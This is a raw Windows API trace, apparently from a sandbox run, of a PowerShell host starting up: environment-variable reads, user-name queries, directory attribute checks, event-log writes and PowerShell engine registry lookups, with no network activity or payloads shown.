	[0653.265] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0653.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.266] CoTaskMemFree (pv=0x1b8c09c0) 
	[0653.267] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0653.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.267] CoTaskMemFree (pv=0x1b8c09c0) 
	[0653.294] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0653.294] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0653.294] CoTaskMemFree (pv=0x1b8cef60) 
	[0653.294] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0653.294] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0653.295] CoTaskMemFree (pv=0x471920) 
	[0653.295] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edbf60*="Certificate", lpRawData=0x2edbcf0) returned 1
	[0653.297] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0653.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0653.297] CoTaskMemFree (pv=0x1b8c09c0) 
	[0653.299] CoTaskMemAlloc (cb=0x20e) returned 0x4c5120
	[0653.299] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4c5120 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0653.299] CoTaskMemFree (pv=0x4c5120) 
	[0654.744] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0654.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.745] CoTaskMemFree (pv=0x1b8c09c0) 
	[0654.745] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0654.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.745] CoTaskMemFree (pv=0x1b8c09c0) 
	[0654.761] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0654.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.761] CoTaskMemFree (pv=0x1b8c09c0) 
	[0654.765] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0654.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.766] CoTaskMemFree (pv=0x1b8c09c0) 
	[0654.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.767] SetErrorMode (uMode=0x1) returned 0x1
	[0654.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d0d0 | out: lpFileInformation=0x24d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0654.767] SetErrorMode (uMode=0x1) returned 0x1
	[0654.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.768] SetErrorMode (uMode=0x1) returned 0x1
	[0654.768] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d0d0 | out: lpFileInformation=0x24d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0654.768] SetErrorMode (uMode=0x1) returned 0x1
	[0654.769] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0654.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0654.769] CoTaskMemFree (pv=0x1b8c09c0) 
	[0654.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.777] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0654.777] SetErrorMode (uMode=0x1) returned 0x1
	[0654.777] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d090 | out: lpFileInformation=0x24d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0654.777] SetErrorMode (uMode=0x1) returned 0x1
	[0654.777] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0654.777] SetErrorMode (uMode=0x1) returned 0x1
	[0654.777] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d090 | out: lpFileInformation=0x24d090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0654.778] SetErrorMode (uMode=0x1) returned 0x1
	[0654.778] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0654.778] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0654.778] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.778] SetErrorMode (uMode=0x1) returned 0x1
	[0654.778] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d090 | out: lpFileInformation=0x24d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0654.778] SetErrorMode (uMode=0x1) returned 0x1
	[0654.778] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.778] SetErrorMode (uMode=0x1) returned 0x1
	[0654.779] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d090 | out: lpFileInformation=0x24d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0654.779] SetErrorMode (uMode=0x1) returned 0x1
	[0654.779] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.779] SetErrorMode (uMode=0x1) returned 0x1
	[0654.779] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d090 | out: lpFileInformation=0x24d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0654.779] SetErrorMode (uMode=0x1) returned 0x1
	[0654.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.780] SetErrorMode (uMode=0x1) returned 0x1
	[0654.780] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d090 | out: lpFileInformation=0x24d090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0654.780] SetErrorMode (uMode=0x1) returned 0x1
	[0654.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.780] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.781] SetErrorMode (uMode=0x1) returned 0x1
	[0654.781] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d0d0 | out: lpFileInformation=0x24d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0654.781] SetErrorMode (uMode=0x1) returned 0x1
	[0654.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.781] SetErrorMode (uMode=0x1) returned 0x1
	[0654.781] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d0d0 | out: lpFileInformation=0x24d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0654.781] SetErrorMode (uMode=0x1) returned 0x1
	[0654.781] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0654.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.782] SetErrorMode (uMode=0x1) returned 0x1
	[0654.782] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d0d0 | out: lpFileInformation=0x24d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0654.782] SetErrorMode (uMode=0x1) returned 0x1
	[0654.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.782] SetErrorMode (uMode=0x1) returned 0x1
	[0654.782] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d0d0 | out: lpFileInformation=0x24d0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0654.782] SetErrorMode (uMode=0x1) returned 0x1
	[0654.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0654.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0656.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0656.581] SetErrorMode (uMode=0x1) returned 0x1
	[0656.581] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d390 | out: lpFileInformation=0x24d390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0656.581] SetErrorMode (uMode=0x1) returned 0x1
	[0656.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0656.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0656.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0656.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0656.608] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0656.608] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6f8) returned 0x1
	[0656.609] CoTaskMemFree (pv=0x1b8cef60) 
	[0656.609] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0656.609] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d738 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d738) returned 1
	[0656.609] CoTaskMemFree (pv=0x471920) 
	[0656.610] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f14c48*="Available", lpRawData=0x2f149d8) returned 1
	[0658.389] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0658.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.389] CoTaskMemFree (pv=0x1b8c09c0) 
	[0658.389] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0658.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.389] CoTaskMemFree (pv=0x1b8c09c0) 
	[0658.391] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0658.392] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0658.392] CoTaskMemFree (pv=0x1b8c09c0) 
	[0658.392] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0658.392] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0658.392] CoTaskMemFree (pv=0x1b8c09c0) 
	[0658.397] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d718 | out: phkResult=0x24d718*=0x384) returned 0x0
	[0658.397] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d69c, lpData=0x0, lpcbData=0x24d698*=0x0 | out: lpType=0x24d69c*=0x1, lpData=0x0, lpcbData=0x24d698*=0x56) returned 0x0
	[0658.397] CoTaskMemAlloc (cb=0x5a) returned 0x1b8c4ed0
	[0658.397] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d66c, lpData=0x1b8c4ed0, lpcbData=0x24d668*=0x56 | out: lpType=0x24d66c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d668*=0x56) returned 0x0
	[0658.397] CoTaskMemFree (pv=0x1b8c4ed0) 
	[0658.397] RegCloseKey (hKey=0x384) returned 0x0
	[0658.399] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0658.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.399] CoTaskMemFree (pv=0x1b8c09c0) 
	[0658.432] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0658.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0658.432] CoTaskMemFree (pv=0x1b8c09c0) 
	[0660.173] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0660.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.174] CoTaskMemFree (pv=0x1b8c09c0) 
	[0660.174] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0660.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.174] CoTaskMemFree (pv=0x1b8c09c0) 
	[0660.175] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0660.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.175] CoTaskMemFree (pv=0x1b8c09c0) 
	[0660.176] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0660.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.176] CoTaskMemFree (pv=0x1b8c09c0) 
	[0660.177] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0660.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.178] CoTaskMemFree (pv=0x1b8c09c0) 
	[0660.178] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0660.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0660.178] CoTaskMemFree (pv=0x1b8c09c0) 
	[0661.706] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0661.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0661.706] CoTaskMemFree (pv=0x1b8c09c0) 
	[0663.370] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8c0ad0
	[0663.373] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8c0be0
	[0670.407] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0670.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.407] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0670.409] CoTaskMemAlloc (cb=0x104) returned 0x1b8c0cf0
	[0670.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c0cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0670.409] CoTaskMemFree (pv=0x1b8c0cf0) 
	[0671.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0671.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0671.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0671.807] VirtualQuery (in: lpAddress=0x24ba20, lpBuffer=0x24c8e0, dwLength=0x30 | out: lpBuffer=0x24c8e0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0671.813] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d878 | out: phkResult=0x24d878*=0x390) returned 0x0
	[0671.813] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d7fc, lpData=0x0, lpcbData=0x24d7f8*=0x0 | out: lpType=0x24d7fc*=0x1, lpData=0x0, lpcbData=0x24d7f8*=0x56) returned 0x0
	[0671.813] CoTaskMemAlloc (cb=0x5a) returned 0x483d60
	[0671.813] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d7cc, lpData=0x483d60, lpcbData=0x24d7c8*=0x56 | out: lpType=0x24d7cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d7c8*=0x56) returned 0x0
	[0671.813] CoTaskMemFree (pv=0x483d60) 
	[0671.813] RegCloseKey (hKey=0x390) returned 0x0
	[0671.813] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d878 | out: phkResult=0x24d878*=0x390) returned 0x0
